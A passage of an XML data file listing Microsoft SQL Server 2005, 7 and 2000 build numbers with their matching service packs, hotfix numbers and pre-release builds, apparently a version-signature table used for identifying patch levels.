</servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1554\n            </version>\n            <servicepack>\n                0+Q926292\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1551\n            </version>\n            <servicepack>\n                0+Q922804\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1550\n            </version>\n            <servicepack>\n                0+Q917887\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1547\n            </version>\n            <servicepack>\n                0+Q918276\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1545\n            </version>\n            <servicepack>\n                0+Q917905\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1541\n            </version>\n            <servicepack>\n                0+Q917888\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1539\n            </version>\n            <servicepack>\n                0+Q917738\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1538\n            </version>\n            <servicepack>\n                0+Q917824\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1536\n            </version>\n            <servicepack>\n                0+Q917016\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1534\n            </version>\n            <servicepack>\n                0+Q916706\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1533\n            </version>\n            <servicepack>\n                0+Q916086\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1532\n            </version>\n            <servicepack>\n                0+Q916046\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1531\n            </version>\n            <servicepack>\n                0+Q915918\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1528\n            </version>\n            <servicepack>\n                0+Q915112\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1519\n            </version>\n            <servicepack>\n                0+Q913494\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1518\n            </version>\n            <servicepack>\n                0+Q912472\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1514\n            </version>\n            <servicepack>\n                0+Q912471\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1503\n            </version>\n            <servicepack>\n                0+Q911662\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1502\n            </version>\n            <servicepack>\n                0+Q915793\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1500\n            </version>\n            <servicepack>\n                0+Q910416\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1406\n            </version>\n            <servicepack>\n                0+Q932557\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1399\n            </version>\n            <servicepack>\n                0\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1314\n            </version>\n            <servicepack>\n                September CTP Release\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1187\n            </version>\n            <servicepack>\n                June CTP Release\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1116\n            </version>\n            <servicepack>\n                April CTP Release\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.1090\n            </version>\n            <servicepack>\n                March CTP Release\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.981\n            </version>\n            <servicepack>\n                December CTP Release\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.951\n            </version>\n            <servicepack>\n                October CTP Release\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.917\n            </version>\n            <servicepack>\n                Internal build\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.852\n            </version>\n            <servicepack>\n                Beta 2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.849\n            </version>\n            <servicepack>\n                Internal build\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.844\n            </version>\n            <servicepack>\n                Internal build\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.836\n            </version>\n            <servicepack>\n                Express Ed. Tech Preview\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.823\n            </version>\n            <servicepack>\n                Internal build\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.790\n            </version>\n            <servicepack>\n                Internal build\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.767\n            </version>\n            <servicepack>\n                Internal build\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.747\n            </version>\n            <servicepack>\n                Internal build\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.645\n            </version>\n            <servicepack>\n                MS Internal\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                9.00.608\n            </version>\n            <servicepack>\n                Beta 1\n            </servicepack>\n        </signature>\n    </signatures>\n    <signatures release=\"7\">\n        <signature>\n            <version>\n                7.00.1152\n            </version>\n            <servicepack>\n                4+Q941203\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1150\n            </version>\n            <servicepack>\n                4+Q891116\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1144\n            </version>\n            <servicepack>\n                4+Q830233\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1143\n            </version>\n            <servicepack>\n                4+Q829015\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1097\n            </version>\n            <servicepack>\n                4+Q822756\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1094\n            </version>\n            <servicepack>\n                4+Q815495\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1079\n            </version>\n            <servicepack>\n                329499\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1078\n            </version>\n            <servicepack>\n                4+Q327068\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1077\n            </version>\n            <servicepack>\n                4+Q316333\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1063\n            </version>\n            <servicepack>\n                4\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1033\n            </version>\n            <servicepack>\n                3+Q324469\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1026\n            </version>\n            <servicepack>\n                3+Q319851\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.1004\n            </version>\n            <servicepack>\n                3+Q304851\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.996\n            </version>\n            <servicepack>\n                3+Q299717\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.978\n            </version>\n            <servicepack>\n                3+Q285870\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.977\n            </version>\n            <servicepack>\n                3+Q284351\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.970\n            </version>\n            <servicepack>\n                3+Q283837\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.961\n            </version>\n            <servicepack>\n                3\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.921\n            </version>\n            <servicepack>\n                2+Q283837\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.919\n            </version>\n            <servicepack>\n                2+Q282243\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.918\n            </version>\n            <servicepack>\n                2+Q280380\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.917\n            </version>\n            <servicepack>\n                2+Q279180\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.910\n            </version>\n            <servicepack>\n                2+Q275901\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.905\n            </version>\n            <servicepack>\n                2+Q274266\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.889\n            </version>\n            <servicepack>\n                2+Q243741\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.879\n            </version>\n            <servicepack>\n                2+Q281185\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.857\n            </version>\n            <servicepack>\n                2+Q260346\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.842\n            </version>\n            <servicepack>\n                2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.839\n            </version>\n            <servicepack>\n                2 Unidentified\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.835\n            </version>\n            <servicepack>\n                2 Beta\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.776\n            </version>\n            <servicepack>\n                1+Q258087\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.770\n            </version>\n            <servicepack>\n                1+Q252905\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.745\n            </version>\n            <servicepack>\n                1+Q253738\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.722\n            </version>\n            <servicepack>\n                1+Q239458\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.699\n            </version>\n            <servicepack>\n                1\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.689\n            </version>\n            <servicepack>\n                1 Beta\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.677\n            </version>\n            <servicepack>\n                MSDE O2K Dev\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.662\n            </version>\n            <servicepack>\n                Gold+Q232707\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.658\n            </version>\n            <servicepack>\n                Gold+Q244763\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.657\n            </version>\n            <servicepack>\n                Gold+Q229875\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.643\n            </version>\n            <servicepack>\n                Gold+Q220156\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.623\n            </version>\n            <servicepack>\n                Gold\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.583\n            </version>\n            <servicepack>\n                RC1\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                7.00.517\n            </version>\n            <servicepack>\n                Beta 3\n            </servicepack>\n        </signature>\n    </signatures>\n    <signatures release=\"2000\">\n        <signature>\n            <version>\n                8.00.2283\n            </version>\n            <servicepack>\n                4+Q971524\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2279\n            </version>\n            <servicepack>\n                4+Q959678\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2271\n            </version>\n            <servicepack>\n                4+Q946584\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2265\n            </version>\n            <servicepack>\n                4+Q944985\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2253\n            </version>\n            <servicepack>\n                4+Q939317\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2249\n            </version>\n            <servicepack>\n                4+Q936232\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2248\n            </version>\n            <servicepack>\n                4+Q935950\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2246\n            </version>\n            <servicepack>\n                4+Q935465\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2245\n            </version>\n            <servicepack>\n                4+Q933573\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2244\n            </version>\n            <servicepack>\n                4+Q934203\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2242\n            </version>\n            <servicepack>\n                4+Q929131\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2238\n            </version>\n            <servicepack>\n                4+Q931932\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2234\n            </version>\n            <servicepack>\n                4+Q929440\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2232\n            </version>\n            <servicepack>\n                4+Q928568\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2231\n            </version>\n            <servicepack>\n                4+Q928079\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2229\n            </version>\n            <servicepack>\n                4+Q927186\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2226\n            </version>\n            <servicepack>\n                4+Q925684\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2223\n            </version>\n            <servicepack>\n                4+Q925678\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2218\n            </version>\n            <servicepack>\n                4+Q925297\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2217\n            </version>\n            <servicepack>\n                4+Q924664\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2215\n            </version>\n            <servicepack>\n                4+Q924662\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2209\n            </version>\n            <servicepack>\n                4+Q923797\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2207\n            </version>\n            <servicepack>\n                4+Q923344\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2201\n            </version>\n            <servicepack>\n                4+Q920930\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2199\n            </version>\n            <servicepack>\n                4+Q919221\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2197\n            </version>\n            <servicepack>\n                4+Q919133\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2196\n            </version>\n            <servicepack>\n                4+Q919165\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2194\n            </version>\n            <servicepack>\n                4+Q917972\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2192\n            </version>\n            <servicepack>\n                4+Q917606\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2191\n            </version>\n            <servicepack>\n                4+Q916698\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2189\n            </version>\n            <servicepack>\n                4+Q916652\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2187\n            </version>\n            <servicepack>\n                4+916287\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2180\n            </version>\n            <servicepack>\n                4+Q913684\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2175\n            </version>\n            <servicepack>\n                4+Q911678\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2172\n            </version>\n            <servicepack>\n                4+Q910707\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2171\n            </version>\n            <servicepack>\n                4+Q909369\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2168\n            </version>\n            <servicepack>\n                4+Q907813\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2167\n            </version>\n            <servicepack>\n                4+Q921293\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2166\n            </version>\n            <servicepack>\n                4+Q909734\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2162\n            </version>\n            <servicepack>\n                4+Q904660\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2156\n            </version>\n            <servicepack>\n                4+Q906790\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2151\n            </version>\n            <servicepack>\n                4+Q903742\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2148\n            </version>\n            <servicepack>\n                4+Q899430\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2147\n            </version>\n            <servicepack>\n                4+Q899410\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2145\n            </version>\n            <servicepack>\n                4+Q826906\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2055\n            </version>\n            <servicepack>\n                4+Q959420\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2040\n            </version>\n            <servicepack>\n                4+Q899761\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2039\n            </version>\n            <servicepack>\n                4\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.2026\n            </version>\n            <servicepack>\n                4 Beta\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1547\n            </version>\n            <servicepack>\n                3+Q899410\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1037\n            </version>\n            <servicepack>\n                3+Q930484\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1036\n            </version>\n            <servicepack>\n                3+Q929410\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1035\n            </version>\n            <servicepack>\n                3+Q917593\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1034\n            </version>\n            <servicepack>\n                3+Q915328\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1029\n            </version>\n            <servicepack>\n                3+Q902852\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1027\n            </version>\n            <servicepack>\n                3+Q900416\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1025\n            </version>\n            <servicepack>\n                3+Q899428\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1024\n            </version>\n            <servicepack>\n                3+Q898709\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1021\n            </version>\n            <servicepack>\n                3+Q887700\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1020\n            </version>\n            <servicepack>\n                3+Q896985\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1019\n            </version>\n            <servicepack>\n                3+Q897572\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1017\n            </version>\n            <servicepack>\n                3+Q896425\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1014\n            </version>\n            <servicepack>\n                3+Q895123\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1013\n            </version>\n            <servicepack>\n                3+Q891866\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1009\n            </version>\n            <servicepack>\n                3+Q894257\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1007\n            </version>\n            <servicepack>\n                3+Q893312\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.1000\n            </version>\n            <servicepack>\n                3+Q891585\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.997\n            </version>\n            <servicepack>\n                3+Q891311\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.996\n            </version>\n            <servicepack>\n                3+Q891017\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.994\n            </version>\n            <servicepack>\n                3+Q890942\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.993\n            </version>\n            <servicepack>\n                3+Q890925\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.991\n            </version>\n            <servicepack>\n                3+Q889314\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.990\n            </version>\n            <servicepack>\n                3+Q890200\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.988\n            </version>\n            <servicepack>\n                3+Q889166\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.985\n            </version>\n            <servicepack>\n                3+Q889239\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.980\n            </version>\n            <servicepack>\n                3+Q887974\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.977\n            </version>\n            <servicepack>\n                3+Q888007\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.973\n            </version>\n            <servicepack>\n                3+Q884554\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.972\n            </version>\n            <servicepack>\n                3+Q885290\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.970\n            </version>\n            <servicepack>\n                3+Q872842\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.967\n            </version>\n            <servicepack>\n                3+Q878501\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.962\n            </version>\n            <servicepack>\n                3+Q883415\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.961\n            </version>\n            <servicepack>\n                3+Q873446\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.959\n            </version>\n            <servicepack>\n                3+Q878500\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.957\n            </version>\n            <servicepack>\n                3+Q870994\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.955\n            </version>\n            <servicepack>\n                3+Q867798\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.954\n            </version>\n            <servicepack>\n                3+Q843282\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.952\n            </version>\n            <servicepack>\n                3+Q867878\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.944\n            </version>\n            <servicepack>\n                3+Q839280\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.937\n            </version>\n            <servicepack>\n                3+Q841776\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.936\n            </version>\n            <servicepack>\n                3+Q841627\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.935\n            </version>\n            <servicepack>\n                3+Q841401\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.934\n            </version>\n            <servicepack>\n                3+Q841404\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.933\n            </version>\n            <servicepack>\n                3+Q840856\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.929\n            </version>\n            <servicepack>\n                3+Q839529\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.928\n            </version>\n            <servicepack>\n                3+Q839589\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.927\n            </version>\n            <servicepack>\n                3+Q839688\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.926\n            </version>\n            <servicepack>\n                3+Q839523\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.923\n            </version>\n            <servicepack>\n                3+Q838460\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.922\n            </version>\n            <servicepack>\n                3+Q837970\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.919\n            </version>\n            <servicepack>\n                3+Q837957\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.916\n            </version>\n            <servicepack>\n                3+Q317989\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.915\n            </version>\n            <servicepack>\n                3+Q837401\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.913\n            </version>\n            <servicepack>\n                3+Q836651\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.911\n            </version>\n            <servicepack>\n                3+Q837957\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.910\n            </version>\n            <servicepack>\n                3+Q834798\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.908\n            </version>\n            <servicepack>\n                3+Q834290\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.904\n            </version>\n            <servicepack>\n                3+Q834453\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.892\n            </version>\n            <servicepack>\n                3+Q833710\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.891\n            </version>\n            <servicepack>\n                3+Q836141\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.879\n            </version>\n            <servicepack>\n                3+Q832977\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.878\n            </version>\n            <servicepack>\n                3+Q831950\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.876\n            </version>\n            <servicepack>\n                3+Q830912\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.873\n            </version>\n            <servicepack>\n                3+Q830887\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.871\n            </version>\n            <servicepack>\n                3+Q830767\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.870\n            </version>\n            <servicepack>\n                3+Q830262\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.869\n            </version>\n            <servicepack>\n                3+Q830588\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.867\n            </version>\n            <servicepack>\n                3+Q830366\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.866\n            </version>\n            <servicepack>\n                3+Q830366\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.865\n            </version>\n            <servicepack>\n                3+Q830395\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.863\n            </version>\n            <servicepack>\n                3+Q829205\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.859\n            </version>\n            <servicepack>\n                3+Q821334\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.858\n            </version>\n            <servicepack>\n                3+Q828637\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.857\n            </version>\n            <servicepack>\n                3+Q828017\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.856\n            </version>\n            <servicepack>\n                3+Q828096\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.854\n            </version>\n            <servicepack>\n                3+Q828699\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.852\n            </version>\n            <servicepack>\n                3+Q830466\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.851\n            </version>\n            <servicepack>\n                3+Q826754\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.850\n            </version>\n            <servicepack>\n                3+Q826860\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.848\n            </version>\n            <servicepack>\n                3+Q826822\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.847\n            </version>\n            <servicepack>\n                3+Q826433\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.845\n            </version>\n            <servicepack>\n                3+Q826364\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.844\n            </version>\n            <servicepack>\n                3+Q826080\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.842\n            </version>\n            <servicepack>\n                3+Q825043\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.841\n            </version>\n            <servicepack>\n                3+Q825225\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.840\n            </version>\n            <servicepack>\n                3+Q319477\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.839\n            </version>\n            <servicepack>\n                3+Q823877\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.837\n            </version>\n            <servicepack>\n                3+Q821741\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.819\n            </version>\n            <servicepack>\n                3+Q826161\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.818\n            </version>\n            <servicepack>\n                3+Q821277\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.816\n            </version>\n            <servicepack>\n                3+Q818766\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.814\n            </version>\n            <servicepack>\n                3+Q819662\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.811\n            </version>\n            <servicepack>\n                3+Q819248\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.807\n            </version>\n            <servicepack>\n                3+Q818899\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.804\n            </version>\n            <servicepack>\n                3+Q818729\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.801\n            </version>\n            <servicepack>\n                3+Q818540\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.800\n            </version>\n            <servicepack>\n                3+Q818414\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.798\n            </version>\n            <servicepack>\n                3+Q817464\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.794\n            </version>\n            <servicepack>\n                3+Q817464\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.791\n            </version>\n            <servicepack>\n                3+Q815249\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.790\n            </version>\n            <servicepack>\n                3+Q817081\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.789\n            </version>\n            <servicepack>\n                3+Q816840\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.788\n            </version>\n            <servicepack>\n                3+Q816985\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.781\n            </version>\n            <servicepack>\n                3+Q815057\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.780\n            </version>\n            <servicepack>\n                3+Q816084\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.779\n            </version>\n            <servicepack>\n                3+Q814035\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.776\n            </version>\n            <servicepack>\n                3+Unidentified\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.775\n            </version>\n            <servicepack>\n                3+Q815115\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.769\n            </version>\n            <servicepack>\n                3+Q814889\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.765\n            </version>\n            <servicepack>\n                &lt;\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.763\n            </version>\n            <servicepack>\n                3+Q814113\n            </servicepack>\n        